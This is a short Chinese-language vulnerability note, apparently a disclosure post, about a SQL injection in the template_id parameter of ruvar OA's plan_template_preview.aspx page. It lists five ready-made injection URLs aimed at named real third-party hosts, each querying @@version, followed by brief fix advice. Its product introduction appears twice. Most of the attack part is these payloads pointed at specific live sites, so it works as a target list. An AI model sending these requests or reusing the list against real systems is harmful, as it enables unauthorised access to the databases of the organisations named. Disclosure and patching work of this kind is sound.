### 0x01 框架介绍 ruvar OA采用基于IE浏览器的 B/S 结构,以人员管理、考勤管理、薪资管理、招聘管理、培训管理、合同管理、社保福利、绩效考核、报表中心为核心功能模块,是企业领导、HR经理和员工全员参与的,可多层次管理的集团版eHR系统。 官方主页:http://www.ruvar.com/  ### 0x02 漏洞细节 /WorkPlan/plan_template_preview.aspx?template_id 处存在SQL注入漏洞。 案例: http://oa.gdjierong.com:8090/WorkPlan/plan_template_preview.aspx?template_id=@@version http://www.kinghighway.com:9000/WorkPlan/plan_template_preview.aspx?template_id=@@version http://oa.ruvar.com/WorkPlan/plan_template_preview.aspx?template_id=@@version http://oa.mingshiedu.com:801/WorkPlan/plan_template_preview.aspx?template_id=@@version http://116.204.107.145:9000/WorkPlan/plan_template_preview.aspx?template_id=@@version  ...
### 0x01 框架介绍 ruvar OA采用基于IE浏览器的 B/S 结构,以人员管理、考勤管理、薪资管理、招聘管理、培训管理、合同管理、社保福利、绩效考核、报表中心为核心功能模块,是企业领导、HR经理和员工全员参与的,可多层次管理的集团版eHR系统。 官方主页:http://www.ruvar.com/  ### 0x02 漏洞细节 /WorkPlan/plan_template_preview.aspx?template_id 处存在SQL注入漏洞。 案例: http://oa.gdjierong.com:8090/WorkPlan/plan_template_preview.aspx?template_id=@@version http://www.kinghighway.com:9000/WorkPlan/plan_template_preview.aspx?template_id=@@version http://oa.ruvar.com/WorkPlan/plan_template_preview.aspx?template_id=@@version http://oa.mingshiedu.com:801/WorkPlan/plan_template_preview.aspx?template_id=@@version http://116.204.107.145:9000/WorkPlan/plan_template_preview.aspx?template_id=@@version     ### 0x03 修复方案 1、过滤漏洞文件参数 2、使用加速乐等防护产品
